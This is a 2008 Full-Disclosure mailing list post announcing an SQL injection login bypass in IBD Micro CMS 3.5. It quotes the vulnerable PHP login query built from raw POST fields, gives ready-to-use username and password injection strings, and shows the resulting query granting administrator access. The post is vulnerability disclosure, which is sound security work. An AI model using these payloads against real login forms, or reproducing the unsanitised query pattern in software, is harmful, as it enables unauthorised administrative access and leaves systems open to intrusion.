Hey guys, I came accross a SQL Injection bug in IBD Micro CMS in version 3.5 and maybe lower...
News about it: http://wired-security.net/archive/2008/may/index.php#12052008 Advisory to read: http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt --- In Short: --- SNIP --- if ($i == 0) { $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")'; $user_result = mysql_query($sql); --- SNIP --- Username: " or "1" = "1 Password: ") or "1" = "1" or PASSWORD(" Will result in: --- SNIP --- $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "" or "1" = "1" and administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")'; --- SNIP --- -> Logged in as administrator! Greets, SkyOut/Wired Security _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
